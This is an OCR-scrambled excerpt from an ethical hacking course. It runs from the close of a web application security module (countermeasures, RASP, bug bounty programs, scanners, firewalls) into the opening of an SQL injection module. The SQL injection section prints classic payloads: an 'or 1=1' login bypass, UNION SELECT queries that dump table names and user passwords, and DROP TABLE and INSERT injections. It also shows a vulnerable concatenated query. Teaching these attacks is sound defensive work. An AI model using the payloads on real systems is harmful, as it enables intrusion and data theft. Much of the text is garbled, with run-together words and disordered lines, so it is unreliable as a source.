scripts thecookies
Clearstoredcookiesfromthe browserregularly
Employ to change
cookierandomization the websiteor a service cookiewhenever
the user makesa request
Usea VPNthat adopts
high-grade andtrafficroutingto preventsession
encryption
sniffing
WebServiceAttack
Usemultiple layerprotectionand standardHTTPauthenticationtechniques to defend
web service attacks.Becausemost modelsincorporate
against business-to-business
it becomes
applications, easier to restrict accessto onlyvalid users.
‘Some
additionalcountermeasuresagainst webservice attacksare as follows:
©. Configure
WSDL
WSDL-basedAccess
Control
Permissions
grant
access
SOAPmessages
to or deny to any typeof

Usedocument-centric
authenticationcredentials
that use SAML
Usemultiple credentialssuchas X.509Cert,
security SAMLassertions,
andWS
Security
Deploy firewalls
web-service-capable thatcan performof SOAP-
andISAPI-level
filtering
Configure
firewalls/IDS for web service anomaly
systems andsignature
detection
Configure
firewalls/IDS to filterimproperSOAP
systems andXMLsyntax
Implement centralizedin-linerequests
andresponse schema validation
Blockexternalreferences anduse pre-fetched content whende-referencing URLs
Maintain andupdate a secure repositoryof XML schemas
Usepassword digests/Kerberos certificatesi n SOAPheaders
tickets/X.509 for
authentication
Usea digital for signingmessagesat the recipient's
signature endandmaintain the
ofthemessages
integrity
UseURLauthorizationto restrict accessto theweb service file (.asmmx)
Authorizeaccess to WSDL
filesusing NTFSpermissions
protocols
Disablethe documentation the dynamic
to prevent of WSDL
generation

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Verify
thecaller'sendpoint
in theSOAP beforedetermining
message whetherthe
SOAPmessageis processed
by the BPEL engine
Disablethe SOAPAction field suchas createUseror deleteUseri n the HTTPrequest
Avoidusingeasily
guessable
SOAPActionterminologies
DisabletheSOAPAction
attributewhennot in use
Makesure to compare the operation
withintheSOAPAction body
andthe SOAP
Clickjacking
Attack

a
>Use server-side
methodsuchas X-Frame-Options
and ALLOW-FROM
SAMEORIGIN, header
its
anduse options
URIto preventthe site from being
DENY,
framedoutside
the
domain methodssuchas Framebusting
Neveruse client-side or Framebreaking
as they
can
be bypassedeasily
Maskthe HTML documentand revealit onlyafter verifying
that the pageis not
framed
Use the Content-Security-Policy (CSP)
HTTPheader as it provides
considerable
for defining
flexibility deployments
sources i n complex

Hijacking
JavaScript
Use
.innerText
rather inthan .innerHTML to encodethetext automatically
JavaScript
Avoid using thefunctionevaldueto its vulnerablenature
Do not write serialization
code
library
Usetheencoding to safeguard
theattributes
anddataelements
andavoid
building
XMLdynamically
UseSSL/TLS
for secure communication andperform on the server
encryption
instead
oftheclient-sidecode
BuildXMLusinganyappropriateframework;
avoidbuilding
XMLmanually
Makesure to return JSONwith an object
externally,
suchas {“result―:
[(“object―:―
inside
array"}]}
UsernameEnumeration
©.
that
inputs
Ensure
error
generic that identifiers
outputs
containing
includeuser
messages
produce only

randomly
Use sequential
dataforusernamesinsteadof
generated numbers
properdefenses
Employ SQLinjection
against andXSSattacksto preventdumpable
user enumeration

‘Always apply
to
makesure to
automatic datacollection
CAPTCHAalltheinputaccepting
pagesto prevent

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Usea WAFto detectandblockall the individual that tryto make
IPaddresses
severalrequests
‘Apply or padding
two-factorauthentication(2FA) techniques
to the responsetime
to preventusernameenumeration
Userandomandcomplex
usernames whencreating
the ActiveDirectory
username
list
Always use only anddifficult-to-guess
complex passwords the default
andchange
usernames andpasswords

Harden all the services to avoidestablishing

nullbind and preventremote root
authentication
Attackon Password
ResetMechanism
Performpropervalidationof therandomtokenandemaillink combination before

the
executing request
Ensurethat all password a re usedonly
reset URLs once andset the expiry time limit

through
Avoidautomatedrequests programsandenforcehumanchecksusing
CAPTCHA
generated
Restrictthenumberof requests fromany IPor devicewithin a stipulated
time
Useadvanced multi-factor (MFA)
authentication techniques
to preventaccount
hijacking
with passwordreset tokens

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
=
S. xe
Xe ecenat

How to Defend Against

Web Application
Attacks
To defendagainst webapplication you can followthe countermeasuresstatedearlier.
attacks,
To protectthe web server,you can use a WAFfirewall/IDS andfilter packets.Youalsoshould
regularly update theserver's softwareusingpatches to protecti t fromattackers.
Sanitizeand
filter the user input,analyze the source codefor SQLinjection,and minimize the use of third-
partyapplications to protect the web applications. You can also use storedprocedures and
parameter queriesto retrieve data and disableverboseerror messages that can provide
attackerswith usefulinformation.Use custom error pagesto protectthe web applications. To
avoidSQLinjection into the database, connect using@non-privileged account and grantthe
leastprivileges to the database, tables,andcolumns.Disablecommands suchas xp_cmdshell,
whichcan affectthe OS.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 RASPfor Protecting
WebServers

el
recan acurty
attacks web
(© detectrumime
conruning
"Runtimeapplicationprotection

vulnerable the
‘iden
RAS)provides
onthe
to andnon-web
apliatin
layer and provide etter vty
on a server

ofthe

{Canara} =

§
© visitty
ao
©Colaberation
andDevops s
we
©Penetration
Hoary)
testing

RASPfor Protecting
Web Servers
RuntimeApplication
SelfProtection(RASP)
is a technology
thatprovides to applications
security
that run on a server. RASPc an beusedfor detecting runtime attackson the real-timesoftware
applicationlayer andcan provide bettervisibility
of hidden vulnerabilities.
RASP c an detectany
maliciousactivityin the incomingtrafficand alsovalidatedata requests. RASPprotectsboth
‘webandnon-webapplications and it can be usedto prevent fakeprogramsfrom being
executedinsidethe application. RASPperforms continuous monitoring to helpremediate
attackssuchas unknownzero-day attacksat an earlystage without any humanintervention,
‘The
RASP layer is placed
withintheapplication
code.It deploys
bymonitoring thetrafficcoming
into the server and applies
protectionmechanisms
wheneverthreat vectors are detected.All
the requestsare examined through the RASPlayerpresentbetweenthe server and the
application
without affecting
the performance
of the application.
Furthermore,
RASPcan
minimized falsepositives.
generate
Benefits
of usingRASP
=
Visibility:
RASPoffers greatervisibility
and lets the user have a detailedview of the
application
to monitor the attacks
Collaboration
and DevOps: It provides
bettercollaboration
andDevOps
as it offers
that
transparency can provide
similar and detailed information to both security
professionals
anddevelopers
Penetrationtesting:Theincreased of RASPhelps
visibility i n avoiding
duplicate
testing,
It alsoprovides
informationaboutsuccessfulattacksandpreviously
testedapplications

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘=
Incidentresponse:RASP supports to facilitate
incidentresponse forsecurity
logging and
compliance bylettingthe user reporton customizedevents without modifyingthe
application

IK Block?y

SQLServer
14.103:Overviewof RASP
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BugBounty
Programs
(©The.
bounty
program
challenge
vulnerabltes
hosted
by
organizations,
software
developers
ia website,or t o tech

secur
developers flltodetet

ofthe
Individuals
or etical hackers the wnerbities ae rewardedaccordingly
whe report based
on the severity
love bugs

Many
and conductbugbounty
orgpnizations companies
patching
ignored
wunerbile
to strengthen
programs thelr cyber by
security

BugBountyPrograms
bugbounty
‘A programis a challenge hostedbyorganizations,
or agreement websites,
or
softwaredevelopers for tech-savvyindividualsor ethicalhackersto participate
andbreak into
theirsecurityto reportthelatestbugs andvulnerabilities.Thisprogramfocuses on identifying
the latestsecurityflawsi n the softwareor any web application that most securitydevelopers
failto detectandwhichmayhenceposea great threat.Therefore,individuals
or ethicalhackers
who reportthe vulnerabilitiesare rewardedaccordingly basedon the severity of the bugs
Thus, any threat or flawthat evadesthe developer can be mitigated beforeit paves the way to
sophisticated cyber-attacks.Manywhite-hathackerscontributeto this programas partof a
comprehensive vulnerabilitydisclosureframeworkandgetrewardedfor theirwork.
Manyorganizations benefitfromsuchprograms,a s theyneedto maintain a keenwatch on
their system securityand identify ignored vulnerabilities.Most of the latestbugs that are not
detectedbylegacy securitytestingtechniques andsoftware toolscan be exploited, resulting in
major data loss.Suchprogramscan also helporganizations to avoid lossof money and
reputation i n the case of a databreach, as offering
rewardsthrough the bug bounty programis
more economical. Therefore, most of the largecompanies u se this programforstrengthening
their security,
whichin turn enhances
websitesandprograms.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebApplication
Security Tools
Testing
Sinica | |seam|
omnes

Ags| n

[S)

Security
Web Application Tools (Cont'd)
Testing
ExploitationFramework(BeEF)
Browser metasloe

Web Application
Security
Testing
Tools
are various web application
‘There a ssessmenttoolsavailablefor scanning,
security detecting,
andassessing the vulnerabilities/security
of web applications.
Thesetoolsrevealtheir security
posture;you can use themto find waysto hardensecurity andcreate robustweb applications.
Furthermore, these tools automate the processof accurate web application security
assessment.Thissectiondiscusses some web applicationsecurity
tools.
testing

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Acunetix
WVS
Source:https://www.acunetix.com
WVSchecksweb applications
‘Acunetix for SQLinjections, etc. It
cross-site scripting,
includes advanced penetration testingtools,suchas HTTPEditorandHTTP Fuzzer.It
scans the portsof a web server and runs security
checksagainst
networkservices. It also
tests web formsand password-protected it provides
areas. Furthermore, effective
vulnerability byallowing
management third-party GitLab,
issue trackerssuchas Jira,

GitHub,
andFogBugz.

e acunetix

igure14.104Screenshot
N-StalkerWebAppSecurity Scanner
Web
of Acunetix Vulnerability
Scanner

Source:https://www.nstalker.com
N-Stalker
WebAppSecurity Scannerchecks forvulnerabilities
suchas SQL XSS,
injection,
and other knownattacks.It is a usefulsecurity system/security
tool for developers,
administrators, andstaff,as it incorporates
IT auditors, thewell-known“N-Stealth
HTTP

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Scanner―
Security alongwith a
and its databaseof 39,000web attack signatures
component-oriented
webapplicationsecurityassessmenttechnology.

=
14.105:
Figure SereenshotofWStalker
Framework(BeEF)
BrowserExploitation
WebApplication
Security
Scanner

Source:http://beefproject.com
TheBrowser Exploitation Framework(BeEF) is a n open-sourcepenetrationtesting tool
usedto
test and exploit
the penetration
application
tester with practical
andbrowservulnerabilities
and browser-based
web applications vulnerabilities.It provides
client-sideattack vectors and leverages
to assessthe security
web
of a targetand perform
further intrusions.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure
14.106:
Screenshot
Someadditionalwebapplication
of
arowser
Expleitaton
testingtoolsare
security
Framework
as
(808)
follows:
+
Metasploit
(https://www.metasploit.com)
+
PowerSploit
(https://github.com)
+

Web
Tool
Watcher Security (https://www.casaba.com)
Netsparker(https://www.netsparker.com)
Arachni(http://arachni-scanner.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebApplication
Firewalls

Web Application
Firewalls
Webapplication
firewalls(WAFs) web applications,
secure websites, andwebservices against
knownandunknownattacks.They
preventdatatheft andmanipulation
andcustomer information.Someof the most commonly
usedWAFSare of
sensitive corporate
as follows:
=
dotDefender
Source:http://www.applicure.com
dotDefenderâ„¢is a software-based WAFthat protectsyour websitefrom malicious
attackssuchas SQLinjection, pathtraversal,cross-sitescripting,andothersthatresult
i n websitedefacement. It complementsthe network firewall, IPS, andother network-
products.
basedInternet security HTTP/HTTPS
It inspects trafficfor suspiciousbehavior.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Sosee Supe Single
ote (Safe)
Patten» Patter

qeceocccs
Classe
SOLC omment
SAL
C omm
‘Union
Selec’
Statement

SQLCHAR
Type
SYSCommands
SOL
ISSRVROLEMEMBER
followed
by(
NSSQL
SpecieSQLInjection

14.107;ereenshot
Figure of dotDefender
web firewall
application
Someadditional firewallsare asfollows:
webapplication
=
VP(https://www.port80software.com)
ServerDefender
=
HCLAppScan®
Standard(https://www.heltech.com)
+

AppWall
Radware's (https://www.radware.com)
WAF(https://wwrw.qualys.com)
Qualys
Firewall(https://www.barracuda.com)
WebApplication
Barracuda

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Summary

We apoleaton
concepts
Variouswe applationatacks

attack
autheniation
tnayangwebappliations, lent sideconto
bypassing
Various
web
apglcatonhacking
tools

webva
web
As, web
Hackingapplications
attemptsbythreatactors
webhooks,
and sels

web applications wingvarious

Securing scurty tls
Inthe
SOL
injection
web
nextmade,we wilco indetahowattackers,a wee ethical
hackers
and
pentesters, perform attackson the target apple

Module Summary
Thismodulepresented
web application various web application
It alsodiscussed
concepts.
attacksi n detail.Furthermore, thewebapplication
it described hacking methodology i n detail
In addition,i t illustratedvarious web applicationhacking tools. It alsodiscussed web API,
‘webhooks,
against
andwebshellconcepts.
web APIs,webhooks,
threat actors’
Moreover,it explained
and web shells.Subsequently,
waysofhacking
it presented
attemptsto hackweb applications. Finally,
webapplications
various countermeasures
it endedwith a detailed
via
discussion on how to secure web applicationsusingvarious security tools,
In the next module,
we will discuss
i n detail howattackers
as well as ethicalhackers
and pen
testers perform
SQLinjection attackso n thetargetwebapplication.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Certified
| Ethical Hacker

Module15:
Injection
SQL
 Module Objectives

Understanding
SOLInjectionConcepts

Understanding of SQL
VariousTypes Attacks
Injection

SOL
Understanding Methodology
Injection

VariousSa njectlonT oo
Understanding

injection
OverviewofSOL Countermeasures

of SQL
‘Overview
Various Detection Took
nection

Module Objectives
SQLinjectionis the most common anddevastating
attackthatattackers
c an launch
to take
controlof a website,Attackersuse various tricksand techniques to compromise data-driven
applications,
‘web causingorganizations to incur severe losses
i n terms of money,reputation,
data,and functionality.
Thismodulewill discuss SQLinjectionattacksas well as the toolsand
techniques
usedbyattackers
to perform
suchattacks.

=
ofthe
At theend this
module,
SL
Describe
willable: you
injection
be
concepts
‘=

=
various
types
Perform
ofSQL
injection
methodology
Describethe SL injection
attacks

Use different tools

Sal injection
=
different
Explain IDSevasion techniques
SQLinjection
‘Adopt countermeasures
UsedifferentSQL detectiontools
injection

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Flow

‘Types
ofSOLInjection Evasion
Techniques
SQL
Injection
Methodology. Countermeasures

SQLInjectionConcepts
Thissection discusses the basicconcepts
of SQLinjectionattacksandtheir intensity.
It starts
with a n introductionto SQLinjectionand the basicsrequiredto understandSQLinjection
attacks,followedbysome examples ofsuchattacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What is SQLInjection?

1 web
througha
s a technique
501injection
application for
of unsanitiedinputvulnerabilities
usedto take advantage
backenddatabaze
bys
execution
to passSALcommands

SQL attack
(©
used
injection
‘rectly
isabasic
fromthedatabase
to ethergainunauthorized
acess toa database
or retrieve information

1@
web
Itisaflaw i n webapplications
andnot a database

‘Why
or server issue

Bother Kbout SQLInjection?

on
theapliations
way
‘Based
proces
supplied
dts, used
wieof
Implementtheflowing
andthe
typesof aac:
they user SA injections canbe to

an of
‘Authentication
andAuthorization
bypass compromised
Integy aati Data

Whatis SQL
Injection?
StructuredQueryLanguage (SQL)is a textual language used by a databaseserver. SQL
commands usedto perform
operationson the databaseincludeINSERT,SELECT,UPDATE, and
DELETE,Thesecommands are usedto manipulatedatain thedatabaseserver.
Programmers SQLcommands
use sequential with client-supplied
parameters,makingit easier
for attackersto injectcommands. SQLinjectionis @technique usedto take advantage of
Unsanitizedinput vulnerabilitiesto pass SQLcommandsthrough a web application for
execution bya backend database. In thistechnique,theattackerinjects
maliciousSQLqueries
into the user inputform either to gain unauthorizedaccess to a databaseor to retrieve
informationdirectly
from the database,Suchattacksare possiblebecauseof a flaw i n web
applications
andnot becauseof anyissuewith thedatabaseor theweb server.
SQLinjectionattacksuse a series of maliciousSQLqueries or SQLstatementsto manipulatethe
database directly.
An application often uses SQLstatements to authenticate users to the
application,
validaterolesand access levels,
store and obtaininformationfor the application
the application
anduser, and link to otherdatasources. SQLinjectionattackswork because
doesnot properlyvalidatean inputbeforepassingi t to an SQL
statement.
Botherabout SQLInjection?
‘Why
SQLinjection websites.An attackcan be attempted
is a majorissue for all database-driven on
any normalwebsiteor softwarepackage basedon how It is usedand how it processes
user-
supplied
data.SQLinjection can beusedto implement the followingattacks:
‘=
Authentication
Bypass: thisattack,
Using logsonto an application
an attacker without
providing
a valid usernameand password,
andgainsadministrativeprivileges.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Authorization
Bypass: this attack,a n attackeraltersauthorizationinformation
Using
an
storedi n thedatabasebyexploiting
InformationDisclosure:
SQL
injection
vulnerability.
this attack,
Using an attackerobtainssensitive informationthat
is storedin thedatabase.

Compromised
DataIntegrity:
malicious aweb
Usingthisattack,an attackerdefaces
content into web pages,or altersthecontents ofa database.
page, inserts

CompromisedAvailabilityof Data:Using this attack,a n attackerdeletesthe database

deletelogs,
information, or auditinformationstoredi n a database.

Remote CodeExecution:Usingthisattack,
an attackercompromisesthe hostOS.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 andServer-sideTechnologies
SQLInjection

|| with
Serverside Powerful
srverside ikeASPNET
technologie anddatabaseserversa llowdevelopers
to
data-drivenwebsites,
‘Technologycreate dynamic andwebapps needle eave

be SL
T hepowerofASPNET
a ndSOL
c an easly exploited
byhackers
using attacks
injection

Susceptible|
| _Alrelstioal
databases,
SaLinjctonO82,areto SALSere Orc IM andMYSQL,susceptible
Databases stacks

a
apps
that
SQLinetonstacks
websitesandweb
d onot expo speci software
do nt followsecre coding
‘manipulating relational
datastoredin databace
instead
vulnerability theytarget
for acesing and
practices

SQL
InjectionandServer-sideTechnologies
Powerfulserver-side technologiessuchas ASP.NET anddatabaseservers allow developers to
create dynamic, data-drivenwebsitesand web applications with incredibleease. These
technologies implement businesslogico n the server side,
whichthen serves incomingrequests
from clients.The server-sidetechnology smoothly accesses,delivers,stores,and restores
information. Variousserver-sidetechnologies include ASP,ASP.Net, Cold Fusion, JSP,PHP,
Python, Rubyo n Rails, and so on. Some of thesetechnologies are prone to SQLinjection
vulnerabilities,and applicationsdeveloped usingthese technologies are vulnerableto SQL
Injection attacks.Web applications use various databasetechnologies as part of their
functionality. Some relational databasesused for developing web applications include
MicrosoftSQLServer, Oracle, IBM DB2, and the open-source MySQL. Developers sometimes
unknowingly ignoresecure coding practices when usingthesetechnologies, whichmakesthe
applicationsandrelationaldatabases vulnerableto SQLinjection attacks.Theseattacksdo not
exploita specific vulnerability;
software’s instead, theytargetwebsitesand webapplications
that do not follow secure coding practices to access and manipulate the data stored i n a
relationaldatabase.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HTTPPOSTRequest
Understanding
Ja
auser
When
Information
provides
and ccks Submit,

browser
the
submits stringto
thewebserver contaning
Users credential
the
raeasenitaatal

This
i HTPS
string sible
ofthe HTTP
or
as follows:
request
inthe

POST
body Vearame

a
Ce

SOL
the
queryat

(Sesrnane =
database

vanieh' and
“<form
actions"

Paseveeds
/ogi-bin/login―

dapit Gporpusreced
m ethedepost>

tamepesoner®>
parcword ‘eingeon’?
=
“<inputtypansubadt
valuestogia>

HTTPPOSTRequest
Understanding
‘An
HTTPPOST requestis a methodfor carryingthe requested data to the web server. Unlike
the HTTPGET method, the HTTP POSTrequest carries the requested data as a partof the
message body.Thus,itis consideredm ore secure thanHTTPGET.HTTPPOST requests can also
passlarge a mounts of data to the server. They
are idealfor communicating with an XML web
service. Thesemethodssubmitand retrieve datafromtheweb server.
Whena user provides informationandclicksSubmit,
the browsersubmitsa stringto the web
server thatcontainstheuser’s
POST requestas
credentials.
is
Thisstring visiblei n thebody
of the HTTPor HTTPS

select * from Users where (username ‘smith’

=
and password 'simpson');
=

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Account
Login
Username (Gait
password (Gineoe
<form action="/cgi-bin/login"
method=post>
Username: <input type=text name: ername>
Password: <input type=password
name=password>

Figure
25.1Example
ofHTTP
POST
request

Module5 2004
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Normal SQLQuery
Understanding

nt
ConstructedSOLQuery<:

‘Server
sideCode
(Badlogin
aspx)

Normal SQL
Understanding Query
‘A
query isan SQLcommand.Programmers write and execute SQLcodein the formof query
statements. SQLqueriesinclude selecting
data,retrievingdata, inserting/updating
data,and
creatingdata objects
suchas databasesandtables.Query statements beginwith a command
suchas SELECT,UPDATE, CREATE,or DELETE.Queriesare usedi n server-side technologies
to
communicate with an application's
database.A user requestsuppliesparameters to replace
placeholders
that maybe usedi n the server-sidelanguage.From this,a query Is constructed
andthenexecutedto fetchdataor performothertaskson the database.
Thediagram
belowshowsa typical
it displays
uponexecution,
SQL
query. values,and
It is constructedwith user-supplied
resultsfromthe database.

ConstructedSOL
Query«

Code
Server-side (Becginanor)

of15.2:Example
Figure normal

ical
SL query

andCountermensores
Mackin ©by E-Comel
Copyright
 Understanding Injection
an SQL Query

†œA t t ac k e r

Launching Injection
SQL

SELECT
Count
(#)FROM Usere WHERE Userttne "ako Password" springtiela’

SAL Executed
Query Cater
arenow
comments
an SQL
Understanding Injection
Query
SQLinjectionquery exploits
‘An the normalexecution of SQL. An attackersubmitsa request
with valuesthat will execute normally but return datafromthe database that the attacker
seeks.Theattackerc an submitthesemalicious valuesbecauseof the inability
of the application
to
filter
thembeforeprocessing.
thenthe application
If thevaluessubmittedbytheusers are not properly
can potentiallybe targetedbyan SQLinjectionattack.
validated,

HTMLformthat
‘An receives and passesinformationposted bythe user to the ActiveServer
Pages (ASP) scriptrunningon an IIS web server is the bestexample of SQLinjection.The
informationpassed is the username and password. To create a n SQLinjectionquery, an
maysubmitthe following
attacker valuesin application
inputfields,suchas theusername and
password fields.
Username: Blah’
or 1=1
Password: Springfield
replace
partof the normalexecution of the query, theseinput valueswill
‘As placeholders,and
the
query
will appearasfollows:
SELECT Count (*) FROM Users
Springfield’ ;
WHERE UserName='Blah' or I=1 AND Password=' --'

of
Acloseexamination this query revealsthat the conditioni n the whereclausewill always
true. Thisquery successfully
be
executesas there is no syntaxerror, andit doesnot violatethe

of
normalexecution the query.
Thediagram belowshowsa typical
SQLinjection query.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ‘Attacker
Launching
SL injection

S01
QueryEoueted
wo Cade char == ew ements

Figure
15.3:
of
SL
injection
attack
xample

Module5 2007
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Understanding
an SQL QueryCode Analysis
Injection -

© Aerts ver

name ndptoverd tat ntces arcodin the nersable

© bers ered sa. gery used ree te

of
numbermatching
roms

© Tre wseristhenouted andredretedto the reseed page

vie the atc

ners BAWor the theSuey
wl be lows

Because»
pir of hphensdenotethe besining
of»
comment
in
SOL the becomes
query

steing eteQry =
"SELECT
Count(*) FROMUsers HHEREUsezWanen'â„¢+

an SQL
Understanding InjectionQuery—Code
Analysis
Codeanalysis or code review is the most effectivetechnique for identifying vulnerabilitiesor
flawsi n the code.An attackerexploits the vulnerabilitiesfound i n the codeto gainaccess to the
database. Anattackerlogs into an account bythe following process:
1. Auserenters a username andpassword that matcha recordi n the user'stable
2 ‘A dynamicallygenerated SQLqueryis usedto retrievethenumber of matching rows
3, Theuser is thenauthenticated
andredirectedto the requested page
or 1=1~, thenthe SQL
4, Whenthe attackerenters blah’ query will looklike
SELECT Count (*) FROMUsers WHEREUserName='blah' Or 1=1 --'
AND
Password=""
pair of
‘A indicatethe beginning
hyphens therefore,
of a comment i n SQL; the query
simply
becomes
SELECT Count(*) FROMUsers WHEREUserName='blah’Or 1=1
string strQry
= "SELECT Count(*) FROM Users
"+
WHEREUserName
txtPassword.Text +

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Example Vulnerable to SQL
of aWebApplication Injection:
BadProductList.aspx
Thisp at splaysproducts tromthe
Northwind database, allowsusers
t o iter theresultingst ofproducts
Using texto ald titer

Uketheprevious
{Badtopn
vulnerable
example
asp),t hsede s
attacks
SL injection

T h eescuteSas dynamically
anstrted from wser-supplied

Example of a Web ApplicationVulnerable to SQL Injection:

BadProducthist.aspx
pageshownin the figure
‘The belowis a hacker's becauseit allowsan astute hacker
paradise to
hijack change
i t and obtain confidentialinformation, data i n the database, damage the
databaserecords,and even create new databaseuser accounts. Most SQL-compliant
including
databases, SQLServer, store metadatai n a series of systemtableswith names
sysobjects,
syscolumns,
sysindexes,
and so on. Thus,a hacker coulduse the systemtablesto
acquire databaseschemainformationto further compromise the database.Forexample,
the
following
text entered
into thetxtFiltertextboxmayrevealthenames ofthe user tablesi n the
database:
UNION SELECT id, name, '', 0 FROMsysobjects WHERExtype ='U" --

In particular,the UNIONstatement is usefulfor a hackerbecauseit splices the resultsof one

query into another.In this case,the hacker hasspliced the names of the Userstablei n the
databaseinto the original query of the Productstable.Theonlytrick is to matchthe number
anddatatypesof the columnswith the original query.Theprevious query might revealthat a
tablenamed
table. Using Users
exists A the
in thedatabase. second
this information,the hackermight
querycouldrevealthe
enter following
UNION SELECT 0, UserName, Password, 0 FROMUsers
columns
in the Users
into thetxtFiltertextbox:
- -

Entering thisqueryrevealsthe usernames andpasswords found i n the Userstable.

Thepage (BadProductList.aspx)
displays
products
fromthe Northwind database
and allows
Usersto filter the resulting
listof products
usinga textboxcalledtxtFilter.Aswith the previous
example
(BadLogin.aspx),
thiscodeis vulnerable attacks.Theexecuted
to SQLinjection SQL
dynamically
queryis constructed froma user-supplied
input.

Module5 2009
Page ical andCountermensores
Mackin Copyright
by E-Comel
©
 (<)>)
hitp://aww certitedhackercom/BadProductUstsox

private void cndFilterclick(ebject sender, systen.EventArgs©) {

bingDataaria(y y

private DataView createoataview() (

1] This code is sus je to SQLinjection attacks

MERE FrochctNaneLIKE '"

+ txt¥iiter.Text +

Feturn dtProgucts efsuitvier

Attack Occurs
Here

15.4:Example
Figure of vulnerable
web appeation-BadProductist
aspx

Module5 2010
Page ical Mackin
and ©
Countermensores
Copyright
by E-Comel
 Example of aWebApplication
Vulnerable to SQL
Attack Analysis
Injection:

seeder
rts
Q [o)

SQLQuery
Executed

Vulnerableto SQL
of aWebApplication
Example Injection:
Attack Analysis
Most websitesprovide searchto enableusers to find a specificproduct or service quickly.
A
separateSearch fieldis maintained on thewebsitei n an area that is easilyviewable.As with
any other inputfield,attackerstargetthis field to performSQLinjectionattacks.An attacker
entersspecific
inputvaluesi n the Searchfield to performan SQLinjectionattack.

CertifiedHtackerShop.com

SOLQuery
Executed

Figure
of
15.5:Example webappliation
vulnerable

Module5 2014
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 of SQLInjection
Examples
[cme
[tac
ig
sor
ch| sc
cur
tant)

ring
oe crcour
so
inom
HCame
ered
hn hnnee CertfedHackercom
Forgot
Password

of SQL
Examples Injection
SQLinjectionquery exploits
‘An the normalexecution of SQL.
Theattackeruses various SQL
to the
commandsmodify values
i n thedatabase.

CertifiedHacker.com

oO
stackerLaunching
5 Injection
Forgot
Password
EmailAddress
Providean emaila ddress
wherewe
tendyourpossword
‘con ret
link
‘SQ VuinerableWebsite
Injection
15.6:Gxample
Figure ofSL Injection
attack

Module
5Page
2012
tical
Making
and by CountermensoresCopyright©
Comet
Thefollowing of SQLinjection
tablelistssome examples attacks

Example AttackerSQL
Query SQLQuery Executed
SELECT b-passwe,
jb-email, jb-ogin_id,
jb-customers
UPDATE
Updating info@certifiedhacker.com’
Table
WHERE
jason@springfield.com;
SET
jb-emai
email
jb-last_name
FROMmembersWHERE
UPDATE jb-customers,
“info@certifiedhacker.com’
WHERE
sson@springfield.com;
~;

jb-email,
SELECT b-passwe,
jb-ogin_id,
INTOjb-customers
ISERT (jb- jb-last_name
FROMmembersWHERE
Adding
New ‘email’
last_name')
VALUES INTO
jb-passwajb-login_id,'b- =

"blah;
INSERT jb-
customers('jb-email'jb-passw!
Records
‘hello’,
springfield); VALUES
(jason@springfield.com’
jason’,jason
jason’
login_idjb-last_name')
(jason@springfield.com’,’hello'
‘Jason
springfield);
AND1=(SELECT
Identifyingblah’ COUNT(*)
FROM SELECT b-passwe,
jb-email, jb-ogin_id,
theTable mytable);
Name
~

jb
=blah’
Note:Youwillneedto guess
jb-last_name
tablenames here
FROMtableWHERE
email
COUNT(*)
AND1=(SELECT
FROMmytable);
~';

SELECTjb-email,b-passw,
jb-ogin_id,
Deleting
a
blah’;
DROPTABLECreditcard; jb-last_name
FROMmembersWHERE
Table jb-emailblah’;
=
DROPTABLE
Creditcard;
Returning SELECT*
FROMUser_DataWHERE
More Data
Table
1 5.1:AttackSOL
Email_|O
q ueries
="blah’
OR
1=1

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Flow

Injection
SQL Concepts
SQL
Tools
Injection

SQL
Injection
Methodology. Countermeasures

Types
of SQLInjection

©sQLinjection ° e

VinesenSA Rate
}-->(Y
GYtrsandsatniecion umonsarmecien) (fetes
Biindinferent
SQL
nection Vente
Wtetatoey
W e

inn
iecomment

commer
Yt
YR) Premera

Ar
Typesof SQL
Injection
Se
various tricksandtechniques
Attackersuse to view, manipulate,
insert,anddeletedatafroman
database.
application's Depending on the technique used,there are severaltypesof SQL
injection the various typesof SQLinjection
attacks.Thissection discusses attacks.Attackersuse
attacksin manydifferent
SQLinjection waysbycorrupting SQLqueries.

ical
Mackin
and Copyright
©
by Countermensores E-Comel
In an SQLinjectionattack,theattackerinjectsmaliciouscodethrough query that can
an SQL
readsensitive dataandeven can modify
(insert/update/delete)
it.
Thereare three main typesof SQLinjection:
=
In-bandSQLInjection: An attackeruses the same communication channelto perform,
the attackand retrieve the results.In-bandattacksare commonly usedand easy-to

SQL
exploit injectionattacks.
error-basedSQLinjection andUNIONSQL injection used
The mostcommonly in-band
SQLattacks
injection are

Blind/Inferential
SQL Injection:
In blind/inferential the attackerhasno error
injection,
messages the attackersimply
fromthe systemto work on. Instead, sendsa malicious
SQLquery to the database.Thistypeof SQlL injectiontakesa longer
time to execute
becausethe resultreturnedis generally
i n Booleanform.Attackersuse true or false
resultsto determinethe structure of the databaseand the data. In the case of
inferential
SQLinjection,no data is transmitted through thewebapplication,and it is
not possible therefore,
for an attackerto retrieve the actualresultof the injection; itis

SQL
calledblind injection.
Out-of-BandSQLInjection: Attackersuse differentcommunication channels (suchas
databaseemailfunctionality and loading
or file writing functions)
to performthe attack
andobtainthe results.Thistypeof attackis difficultto performbecausetheattacker
needsto communicate with the server and determinethe featuresof the database
by
used thewebapplication.
server
belowshowsthe different
Thediagram typesof SQLinjection:
@ SALInjection ® e

{== > mn

‘ind/eterertia
Sat (7
tmbanéinjectionod
Y
uwon

tnceer
